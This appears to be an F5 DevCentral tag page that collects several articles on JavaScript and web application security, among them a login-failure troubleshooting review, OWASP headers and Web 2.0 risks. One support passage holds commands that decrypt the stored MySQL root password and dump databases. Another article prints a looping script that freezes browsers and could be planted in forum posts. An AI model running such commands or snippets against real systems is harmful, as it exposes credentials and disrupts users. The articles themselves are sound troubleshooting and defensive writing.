javascript
10 TopicsJavascript injecting systems effect on web application end users - a scenario review
Hello! ArvinF is back to share a scenario review where Javascript-injecting systems affected web application end users - web and mobile application. Problem Users are failing to login to a web application protected by BIG-IP ASM/Adv WAF and Shape Security Defense. The site owner notes that the authentication was failing for an unknown reason. There were ASM Support ID noted and an error informing to enable Javascript. Please enable JavaScript to view the page’s content. Your support ID is: xxxxxxxxxxxx Troubleshooting To understand the cause of the authentication failure, we gathered HTTP traffic through a HTTP sniffer. We used httpwatch and gathered HAR (HTTP Archive) files. The site was protected with both on-premise BIG-IP ASM/Adv WAF bot defense and back then, Shape Security Defense (now F5 Distributed Cloud Bot Defense). After the review of the HAR file in httpwatch, the following were noted: ASM blocks a request in a URL related to authentication with a Support ID in the response. There was also javascript code included and it references https[:]//s[.]go-mpulse[.]net/boomerang/. The authentication attempt failed with an error in the HTTP response: ...unable to process your request. Please try again later... BIG-IP ASM/Adv WAF related HTTP cookies from its various features such as Bot Defense Client Side challenges as TSPD_101* cookie was present and other TS cookies, which could also come from Bot defense and DoS profile and security policy configurations. There were also HTTP cookies coming from BIG-IP AVR - f5_cspm cookie was present. Application Visibility and Reporting (AVR) module provides detailed charts and graphs to give you more insight into the performance of web applications, with detailed views on HTTP and TCP stats, as well as system performance (CPU, memory, etc.). https://clouddocs.f5.com/training/community/analytics/html/index.html https://clouddocs.f5.com/api/irules/AVR_CSPM_INJECTION.html Seeing the javascript code referencing "/boomerang/" included in the ASM blocking response was interesting. Reviewing the HAR file, there were several instances of this "/boomerang/". This finding was inquired with the site owner and they noted that there is another system that is in the path between the end users and their web application - a CDN. The traffic flow is as follows: End user web browser / mobile application >>> CDN >>> FW >>> BIG-IP >>> web application On the BIG-IP Virtual Server that fronts the web application, F5 AVR profile, ASM/Adv WAF Bot defense, and security policy and Shape Security defense iRule are configured. From the F5 side, these were the products with features that may insert Javascript in the client-side response. As part of troubleshooting, to isolate the feature that might be causing the failing authentication for the web application, the bot defense profile was removed from the site's Virtual Server and the Shape Security iRule and AVR profile were left untouched. Site owner noted that the authentication works after this change. Shape Security Defense was implemented using an iRule to protect specific URIs. When the iRule was removed from the Virtual Server and the Bot defense and AVR profile were left on, the VS, Site owner noted that the authentication works after this change. But if both ASM/Adv WAF Bot defense and Shape Security Defense iRule is configured on the VS, the site's authentication fails. Per the site owner, there were no changes in the Bot Defense or Shape Security Defense iRule configurations prior to the incident and that these configurations were in place way before the incident. Site owners shared the findings with their respective internal teams for their review. Resolution Afterwards, Site owner shared that their site now works as expected and authentication works for the web application with no changes done on both ASM/Adv WAF Bot defense and Shape Security Defense iRule on the site's VS. The cause of the authentication failure was undetermined. A theory on the possible cause of the issue was perhaps, there was another system inserting Javascript code in the responses and it might have affected the authentication process of the web application by prevented that portion of the site from loading. Additional Troubleshooting Notes The data gathered during the troubleshooting were the qkview and HTTPWatch capture - HAR files. It would help if a packet capture was taken along with the HTTPWatch capture while the issue was happening to have a full view of the issue. Decrypt the packet capture to observe HTTP exchanges and to correlate it with HTTPWatch capture events. The corresponding BIG-IP ASM/Adv WAF application event logs, Bot Defense or DoS protection logs will also be helpful in the correlation. Having a visual idea on how the Security Policy, Bot Defense or DoS protection profile are configured is also helpful - so its good to have a screenshot of these. It helps in analysis when there is complete data. Gathering the asmqkview with report and traffic data and corresponding ASM and AVR db dumps helps in the analysis. asmqkview -s0 --add-request-log --include-traffic-data -f /var/tmp/`/bin/hostname`_asmqkview_`date +%Y%m%d%H%M%S`.tgz #mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` DCC | gzip -9 > /shared/tmp/dcc.dump.gz # mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` PLC | gzip -9 > /shared/tmp/plc.dump.gz # mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` PRX | gzip -9 > /shared/tmp/prx.dump.gz # mysqldump -uroot -p`perl -I/ts/packages -MPassCrypt -nle 'print PassCrypt::decrypt_password($_)' /var/db/mysqlpw` logdb | gzip -9 > /shared/tmp/logdb.dump.gz It would also help if the systems in the path of the web application are known and whether it has features that may interfere with the features of BIG-IP ASM/Adv WAF or Shape Security Defense. Per the findings, there was a CDN that was injecting javascript code in the HTTP response and it may have contributed to the authentication failure for the end users. Isolate potentially conflicting features by removing one of them one at a time and observe the HTTP responses. Per the reference configuration, BIG-IP ASM/Adv WAF, Shape Security Defense, and BIG-IP AVR worked well prior to the incident. boomerang The injected javascript code noted in the ASM blocking page response was loaded from https[:]//s[.]go-mpulse[.]net/boomerang/. Checking this reference, it was related to https://github.com/akamai/boomerang. boomerang is a JavaScript library that measures the page load time experienced by real users, commonly called RUM (Real User Measurement). It has the ability to send this data back to your server for further analysis. With boomerang, you find out exactly how fast your users think your site is. In BIG-IP, the similar product we have is BIG-IP AVR - Application Visibility and Reporting (AVR) - where it collects "performance of web applications, with detailed views on HTTP and TCP stats, as well as system performance (CPU, memory, etc.)." Organizations may have specific needs on data that they need to collect from their site/web application and using a customizable solution such as boomerang can help. That's It For Now I hope this scenario review on Javascript-injecting systems effect on web application end users will be helpful on your next troubleshooting and hopefully gives you guidance on what data to gather and look for and troubleshooting options. The F5 SIRT creates security-related content posted here in DevCentral, sharing the team’s security mindset and knowledge. Feel free to view the articles that are tagged with the following: F5 SIRT series-F5SIRT-this-week-in-security TWIS200Views1like0CommentsSnippet #7: OWASP Useful HTTP Headers
If you develop and deploy web applications then security is on your mind. When I want to understand a web security topic I go to OWASP.org, a community dedicated to enabling the world to create trustworthy web applications. One of my favorite OWASP wiki pages is the list of useful HTTP headers. This page lists a few HTTP headers which, when added to the HTTP responses of an app, enhances its security practically for free. Let’s examine the list… These headers can be added without concern that they affect application behavior: X-XSS-Protection Forces the enabling of cross-site scripting protection in the browser (useful when the protection may have been disabled) X-Content-Type-Options Prevents browsers from treating a response differently than the Content-Type header indicates These headers may need some consideration before implementing: Public-Key-Pins Helps avoid *-in-the-middle attacks using forged certificates Strict-Transport-Security Enforces the used of HTTPS in your application, covered in some depth by Andrew Jenkins X-Frame-Options / Frame-Options Used to avoid "clickjacking", but can break an application; usually you want this Content-Security-Policy / X-Content-Security-Policy / X-Webkit-CSP Provides a policy for how the browser renders an app, aimed at avoiding XSS Content-Security-Policy-Report-Only Similar to CSP above, but only reports, no enforcement Here is a script that incorporates three of the above headers, which are generally safe to add to any application: And that's it: About 20 lines of code to add 100 more bytes to the total HTTP response, and enhanced enhanced application security! Go get your own FREE license and try it today!738Views0likes2CommentsF5 Friday: An On-Demand Turing Test
Detecting bots requires more than a simple USER_AGENT check today… Anyone who’s taken an artificial intelligence class in college or grad school knows all about the Turing Test. If you aren’t familiar with the concept, it was a “test proposed by Alan Turing in his 1950 paper Computing Machinery and Intelligence, which opens with the words: "I propose to consider the question, 'Can machines think?'" Traditional Turing Tests always involve three players, and the goal is to fool a human interviewer such that the interviewer cannot determine which of the two players is human and which is a computer. There are variations on this theme, but they are almost always focused on “fooling” an interviewer regarding some aspect of the machine that it is attempting to imitate. Common understanding has it that the purpose of the Turing Test is not specifically to determine whether a computer is able to fool an interrogator into believing that it is a human, but rather whether a computer could imitate a human. [44] While there is some dispute whether this interpretation was intended by Turing — Sterrett believes that it was [43] and thus conflates the second version with this one, while others, such as Traiger, do not [41] — this has nevertheless led to what can be viewed as the "standard interpretation." In this version, player A is a computer and player B a person of either gender. The role of the interrogator is not to determine which is male and which is female, but which is a computer and which is a human. [45] -- Wikipedia, Turing Test Over the past decade, as the web has grown more connected and intelligent, so too have the bots that crawl its voluminous pages attempting to index the web and make it possible for search engines like Google and Bing to be useful. Simultaneously have come the evil bots, the scripts, the automated attempts at exploiting vulnerabilities and finding holes in software that enable malicious miscreants to access data and systems to which they are not authorized. While a web application firewall and secure software development lifecycle practices can detect an attempted exploit, neither are necessarily very good at determining whether the request is coming from a bot (machine) or a real user. Given the very real threat posed by bots, it’s becoming increasingly important for organizations to detect and prevent these automated digital rodents from having access to web applications, especially business-critical applications. The trick is, however, to determine which requests are coming from bots and which ones are coming from real users. It’s a trick not only because this determination is difficult to make with a high degree of confidence in the result, but because it needs to be determined on-demand, in real-time. What organizations need is a sort of “on-demand Turing test” that can sort out the bots from the not bots.229Views0likes0CommentsThe Great Client-Server Architecture Myth
The webification of applications over the years has led to the belief that client-server as an architecture is dying. But very few beliefs about architecture have been further from the truth. The belief that client-server was dying - or at least falling out of favor - was primarily due to fact that early browser technology was used only as a presentation mechanism. The browser did not execute application logic, did not participate in application logic, and acted more or less like a television: smart enough to know how to display data but not smart enough to do anything about it. But the sudden explosion of Web 2.0 style applications and REST APIs have changed all that and client-server is very much in style again, albeit with a twist. Developers no longer need to write the core of a so-called "fat client" from the ground up. The browser or a framework such as Adobe AIR or Microsoft's Silverlight provide the client-side platform on which applications are developed and deployed. These client-side platforms have become very similar in nature to their server-side cousins, application servers, taking care of the tedious tasks associated with building and making connections to servers, parsing data, and even storage of user-specific configuration data. Even traditional thin-client applications are now packing on the pounds, using AJAX and various JavaScript libraries to provide both connectivity and presentation components to developers in the same fashion that AIR and Silverlight provide a framework for developers to build richer, highly interactive applications. These so-called RIAs (Rich Internet Applications) are, in reality, thin-clients that are rapidly gaining weight. One of the core reasons client-server architecture is being reinvigorated is the acceptance of standards. As developers have moved toward not only HTTP as the de facto transport protocol but HTML, DHTML, CSS, and JavaScript as primary client-side technologies so have device makers accepted these technologies as the "one true way" to deliver applications to multiple clients from a single server-side architecture. It's no longer required that a client be developed for every possible operating system and device combination. A single server-side application can serve any and all clients capable of communicating via HTTP and rendering HTML, DHTML, CSS, and executing client-side scripts. Standards, they are good things after all. Client-server architectures are not going away. They have simply morphed from an environment-specific model to an environment-agnostic model that is much more efficient in terms of development costs and ability to support a wider range of users, but they are still based on the same architectural principles. Client-server as a model works and will continue to work as long as the infrastructure over which such applications are delivered continue to mature and recognize that while one application may be capable of being deployed and utilized from any device that the environments over which they are delivered may impact the performance and security of those applications. The combination of fatter applications and increasing client-side application logic execution means more opportunities for exploitation as well as the potential for degradation of performance. Because client-server applications are now agnostic and capable of being delivered and used on a variety of devices and clients that they are not specifically optimized for any given environment and developers do not necessarily have access to the network and transport layer components they would need in order to optimize them. These applications are written specifically to not care, and yet the device and the location of the user and the network over which the application is delivered is relevant to application performance and security. The need for context-aware application delivery is more important now than ever, as the same application may be served to the same user but rendered in a variety of different client environments and in a variety of locations. All these variables must be accounted for in order to deliver these fat clients RIAs in the most secure, performant fashion regardless of where the user may be, over what network the application is being delivered, and what device the user may be using at the time.250Views0likes0CommentsWhy it's so hard to secure JavaScript
The discussion yesterday on JavaScript and security got me thinking about why it is that there are no good options other than script management add-ons like NoScript for securing JavaScript. In a compiled language there may be multiple ways to write a loop, but the underlying object code generated is the same. A loop is a loop, regardless of how it's represented in the language. Security products that insert shims into the stack, run as a proxy on the server, or reside in the network can look for anomalies in that object code. This is the basis for many types of network security - IDS, IPS, AVS, intelligent firewalls. They look for anomalies in signatures and if they find one they consider it a threat. While the execution of a loop in an interpreted language is also the same regardless of how it's represented, it looks different to security devices because it's often text-based as is the case with JavaScript and XML. There are only two good options for externally applying security to languages that are interpreted on the client: pattern matching/regex and parsing. Pattern matching and regular expressions provide minimal value for securing client-side interpreted languages, at best, because of the incredibly high number of possible combinations of putting together code. Where's F5? VMWorld Sept 15-18 in Las Vegas Storage Decisions Sept 23-24 in New York Networld IT Roadmap Sept 23 in Dallas Oracle Open World Sept 21-25 in San Francisco Storage Networking World Oct 13-16 in Dallas Storage Expo 2008 UK Oct 15-16 in London Storage Networking World Oct 27-29 in Frankfurt As we learned from preventing SQL injection and XSS, attackers are easily able to avoid detection by these systems by simply adding white space, removing white space, using encoding tricks, and just generally finding a new permutation of their code. Parsing is, of course, the best answer. As 7rans noted yesterday regarding the Billion More Laughs JavaScript hack, if you control the stack, you control the execution of the code. Similarly, if you parse the data you can get it into a format more akin to that of a compiled language and then you can secure it. That's the reasoning behind XML threat defense, or XML firewalls. In fact, all SOA and XML security devices necessarily parse the XML they are protecting - because that's the only way to know whether or not some typical XML attacks, like the Billion Laughs attack, are present. But this implementation comes at a price: performance. Parsing XML is compute intensive, and it necessarily adds latency. Every device you add into the delivery path that must parse the XML to route it, secure it, or transform it adds latency and increases response time, which decreases overall application performance. This is one of the primary reasons most XML-focused solutions prefer to use a streaming parser. Streaming parser performance is much better than a full DOM parser, and still provides the opportunity to validate the XML and find malicious code. It isn't a panacea, however, as there are still some situations where streaming can't be used - primarily when transformation is involved. We know this already, and also know that JavaScript and client-side interpreted languages in general are far more prolific than XML. Parsing JavaScript externally to determine whether it contains malicious code would certainly make it more secure, but it would also likely severely impact application performance - and not in a good way. We also know that streaming JavaScript isn't a solution because unlike an XML document, JavaScript is not confined. JavaScript is delimited, certainly, but it isn't confined to just being in the HEAD of an HTML document. It can be anywhere in the document, and often is. Worse, JavaScript can self-modify at run-time - and often does. That means that the security threat may not be in the syntax or the code when it's delivered to the client, but it might appear once the script is executed. Not only would an intermediate security device need to parse the JavaScript, it would need to execute it in order to properly secure it. While almost all web application security solutions - ours included - are capable of finding specific attacks like XSS and SQL injection that are hidden within JavaScript, none are able to detect and prevent JavaScript code-based exploits unless they can be identified by a specific signature or pattern. And as we've just established, that's no guarantee the exploits won't morph and change as soon as they can be prevented. That's why browser add-ons like NoScript are so popular. Because JavaScript security today is binary: allow or deny. Period. There's no real in between. There is no JavaScript proxy that parses and rejects malicious script, no solution that proactively scans JavaScript for code-based exploits, no external answer to the problem. That means we have to rely on the browser developers to not only write a good browser with all the bells and whistles we like, but for security, as well. I am not aware of any security solution that currently parses out JavaScript before it's delivered to the client. If there are any out there, I'd love to hear about them.273Views0likes1CommentA Billion More Laughs: The JavaScript hack that acts like an XML attack
Don is off in Lowell working on a project with our ARX folks so I was working late last night (finishing my daily read of the Internet) and ended up reading Scott Hanselman's discussion of threads versus processes in Chrome and IE8. It was a great read, if you like that kind of thing (I do), and it does a great job of digging into some of the RAMifications (pun intended) of the new programmatic models for both browsers. But this isn't about processes or threads, it's about an interesting comment that caught my eye: This will make IE8 Beta 2 unresponsive .. t = document.getElementById("test"); while(true) { t.innerHTML += "a"; } What really grabbed my attention is that this little snippet of code is so eerily similar to the XML "Billion Laughs" exploit, in which an entity is expanded recursively for, well, forever and essentially causes a DoS attack on whatever system (browser, server) was attempting to parse the document. What makes scripts like this scary is that many forums and blogs that are less vehement about disallowing HTML and script can be easily exploited by a code snippet like this, which could cause the browser of all users viewing the infected post to essentially "lock up". This is one of the reasons why IE8 and Chrome moved to a more segregated tabbed model, with each tab basically its own process rather than a thread - to prevent corruption in one from affecting others. But given the comment this doesn't seem to be the case with IE8 (there's no indication Chrome was tested with this code, so whether it handles the situation or not is still to be discovered). This is likely because it's not a corruption, it's valid JavaScript. It just happens to be consuming large quantities of memory very quickly and not giving the other processes in other tabs in IE8 a chance to execute. The reason the JavaScript version was so intriguing was that it's nearly impossible to stop. The XML version can be easily detected and prevented by an XML firewall and most modern XML parsers can be configured to stop parsing and thus prevent the document from wreaking havoc on a system. But this JavaScript version is much more difficult to detect and thus prevent because it's code and thus not confined to a specific format with specific syntactical attributes. I can think of about 20 different versions of this script - all valid and all of them different enough to make pattern matching or regular expressions useless for detection. And I'm no evil genius, so you can bet there are many more. The best option for addressing this problem? Disable scripts. The conundrum is that disabling scripts can cause many, many sites to become unusable because they are taking advantage of AJAX functionality, which requires...yup, scripts. You can certainly enable scripts only on specific sites you trust (which is likely what most security folks would suggest should be default behavior anyway) but that's a PITA and the very users we're trying to protect aren't likely to take the time to do this - or even understand why it's necessary. With the increasing dependence upon scripting to provide functionality for RIAs (Rich Interactive Applications) we're going to have to figure out how to address this problem, and address it soon. Eliminating scripting is not an option, and a default deny policy (essentially whitelisting) is unrealistic. Perhaps it's time for signed scripts to make a comeback.450Views0likes4CommentsWorking around client-side limitations on custom HTTP headers
One of the most well-kept secrets in technology is the extensibility of HTTP. It's one of the reasons it became the de facto application transport protocol and it was instrumental in getting SOAP off the ground before SOAP 1.2 and WS-I Basic Profile made the requirement for the SOAP Action header obsolete. Web browsers aren't capable of adding custom HTTP headers on their own; that functionality comes from the use of client-side scripting languages such as JavaScript or VBScript. Other RIA (Rich Internet Applications) client platforms such as Adobe AIR and Flash are also capable of adding HTTP headers, though both have limitations on which (if any) custom headers you can use. There are valid reasons for wanting to set a custom header. The most common use of custom HTTP headers is to preserve in some way the source IP address of the client for logging purposes in a load-balanced environment using the X-Forwarded-For custom header. Custom HTTP headers can be set by the client or set by the server or intermediary (load-balancer, application delivery controller, cache) as well and often are to indicate that the content has passed through a proxy. A quick perusal of the web shows developers desiring to use custom HTTP headers for a variety of reasons including security, SSO (single sign on) functionality, and to transfer data between pages/applications. Unfortunately, a class of vulnerabilities known as "HTTP header injection" often causes platform providers like Adobe to limit or completely remove the ability to manipulate HTTP headers on the client. And adding custom headers using JavaScript or VBScript may require modification of the application and relies on the user allowing scripts to run in the first place, the consistency of which can no longer be relied upon. But what if you really need those custom headers to either address a problem or enable some functionality? All is not lost; you can generally use an intelligent proxy-based load balancer (application delivery controller) to insert the headers for you.If the load balancer/application delivery controller has the ability to inspect requests and modify the requests and responses with a technology like iRules, you can easily add your custom headers at the intermediary without losing the functionality desired or needing to change the request method from GET to POST, as some have done to get around these limitations. Using your load balancer/application delivery controller to insert, delete, or modify custom HTTP headers has other advantages as well: You don't need to modify the client or the server-side application or script that served the client The load balancer can add the required custom HTTP header(s) for all applications at one time in one place Your application will still work even if the client disables scripting Custom HTTP headers are often used for valid reasons when developing applications. The inability to manipulate them easily on the client can interfere with the development lifecycle and make it more difficult to address vulnerabilities and quirks with packaged applications and the platforms on which applications are often deployed. Taking advantage of more advanced features available in modern load balancers/application delivery controllers makes implementing such workarounds simple.402Views0likes0CommentsFollow up: Speeding Up JavaScript
Diving more deeply into the issue of speeding up JavaScript and the load balancing question, Scott Conroy points out: The single URL strategy has a major downside, though it is certainly cleaner than having to deal with many URLs. Since HTTP 1.1 says that user agents and servers SHOULD have only two concurrent connections, requests for multiple resources can easily develop into blocking operations. If, say, I have a page that includes twenty images to download, my browser (in its default config) will only download 2 images at a time. If I put those images on multiple "servers" (e.g. a.images.example.com, b.images.example.com, c.images.example.com) then I'm able to download two images from *each* of the servers. Accomplishing this without a content management system - or some fancy HTTP response rewriting - could be onerous, but it's likely worth it for some media-rich sites/applications. I took umbrage at the statement "This [a single URL] is not easy to scale" because I was looking at it purely from a server-side view point. My bad. Scott points out, correctly, that the ability to scale on the server side doesn't do a darn thing for the client-side. If user agents correctly implement HTTP 1.1 then requests for multiple resources via a singlehost can indeed easily develop into blocking operations. I do think a multiple host option is a good solution to this issue in general, but I'm not thrilled about accomplishing such an implementation by hardcoding those hosts/URIs inside the applications being delivered. Scott appears to agree, pointing out that without help - he suggests a content management system or fancy HTTP response rewriting - this solution to the client-side scaling issue might be "onerous" to implement. Certainly as sites grow larger and more complex, or changes are made, this architectural solution will take more time to deploy/maintain and, because you're modifying code, increases the possibility of introducing delivery errors through malformed URLs. WebAccelerator has long included a feature set called Intelligent Browser Referencing that, among other optimization and accelerationoptions,includes this very functionality, i.e. using multiple hosts to increase the number of connections between the client and the server and thus decreasing the time to load required. It does this transparently and scales well, which reduces several of the problems inherent with implementing this type of solution manually. Particularly the possibility of serving up malformed URLs. The problem with this solution (multiple hosts) in general is that many folks today use hosting providers, and those hosting providers don't always allow you to create additional host names willy-nilly unless you're lucky enough to be hosting your entire domain with them. Even then you may find it's an onerous process to add additional host names before modifying applications to use them. This is particularly true for the use case first introduced with this topic - blogs. Imbibing: Coffee Technorati tags: MacVittie, f5, biG-IP, application delivery, web 2.0, javascript, application acceleration194Views0likes0CommentsWeb 2.0 Security Part 5: Strategies to CUT RISK
Over the past few weeks we've examined the issues inherent with Web 2.0 and in particular AJAX-based applications. These issues need to be dealt with, but they should not be considered "show stoppers" to moving ahead with your Web 2.0 initiative. Consider the security ramifications of the design, implementation, and deployment of your new application carefully. Build security into your new application up front and you'll certainly be able to decrease the potential risks associated with this growing technology. Consider the following methodsto CUT the RISK associated with deploying Web 2.0 applications: •Check VA tools for AJAX support. Validate that the assessment and test tools you use to verify the security of your applications are capable of: Interpreting and evaluating dynamic URLs from JavaScript Creating (or capturing at a minimum) requests in the appropriate markup languages JSON, XML, D/HTML •Understand the application. Document and examine regularly: Scripts associated with the application Data sources accessed Access patterns Cookies used •Trust no client. Implement policies that assumes the request is coming from an attacker Validate input Validate request Validate client •Reduce the number of scripts. If possible, reduce the number of scripts/applications to reduce the entry points through which attackers can gain entry/access to the application •Invest in a web application firewall. Web Application Firewalls mediate between client and server and provide: Application security through request verification Client security through response verification Not a panacea, but a first line of defense Cannot stop logic layer attacks •Secure sensitive data using SSL. SSL for transport layer encryption Cookie encryption •Kick back suspicious data. Data Integrity should be validated on both request and response Stop sensitive data from leaving the organization Stop malicious data and code from entering the organization Choose from one or more options: code (custom), software, hardware Imbibing: Coffee Technorati tags: F5, MacVittie, Web 2.0, security, AJAX, application security, javascript207Views0likes0CommentsWeb 2.0 Security Part 3: A MASHup of Problems
This is Part3 of a series on Web 2.0 Security. A good way to remember things is to use mnemonics, so when you're trying to list the security issues relevant to Web 2.0 just remember this: it's a MASHup. More of everything. Asymmetric data formats Scripting based Hidden URLs and code This episode is brought to you by the letter "S". Scripting-based Web 2.0 technologies, specifically AJAX, are based on the execution of scripts. As we mentioned in Part Iof this series, there are a lot more scripts than is typically found in a web-based application. While on the server side this is often alleviated by combining multiple scripts into a single application that takes advantage of parameter-based execution that is more closely related to SOA than not, there are also scripts on the client that open up new security threats. In fact, here's a few client-side scripting vulnerabilities that have been discovered - and subsequently exploited: Yahoo Worm MySpace Worm AJAX-Spell HTML Tag Script Injection Vulnerability These vulnerabilities only scratch the surface of how JavaScript might be exploited. One of the problems with JavaScript is that it's interpreted on the client, and there are no validation mechanisms. That is, malicious JavaScript looks just like valid JavaScript. You can't just examine the script for specific keywords or patterns and determine that the script is malicious. JavaScript is also self-extensible. That is to say that you can modify existing JavaScript objects - like the XMLHttpRequest object - by forcing the browser to evaluate new JavaScript that extends and adds functionality to the object. And by "forcing" I really mean by delivering a script to the client; the browser will gleefully interpret any script in the page as long as it's in a language it understands. JavaScript is also dynamic. It can evaluate code that extends itself which in turns evaluates more code and so on. The possibilities are limited only by the creativeness of the author. Where the sandbox (the JVM) was supposed to - and for the most part does - protect the client from most of the really horrible possible exploits such as destruction of your files, it doesn't prevent some of the more subtle exploits dealing with sensitive data such as Cookie Theft or just generally grabbing data from your global clipboard. The Risks There is no way to distinguish malicious script from valid script, leaving attackers free to inject scripts into the client via infected web sites or other techniques that modify the core behavior of Web 2.0 applications Developers don't "own" the client (browser) so it's difficult to enforce specific security policies on users that might assist in protecting them from scripting-based vulnerabilities Sensitive data can be easily be retreived JavaScript is often used to construct URLs for communication; most vulnerability assessment scanners cannot interpret JavaScript and therefore cannot validate the constructed URLs. The issue of hidden URLs is the subject of the letter "H", which we'll discuss inthenext part of this series. Next: Hidden URLs Imbibing: Apple Juice (no, I'm not kidding) Technorati tags: web 2.0, security, MacVittie, F5, AJAX Technorati tags: F5, MacVittie, Web 2.0, AJAX, security, application security, Javascript275Views0likes0Comments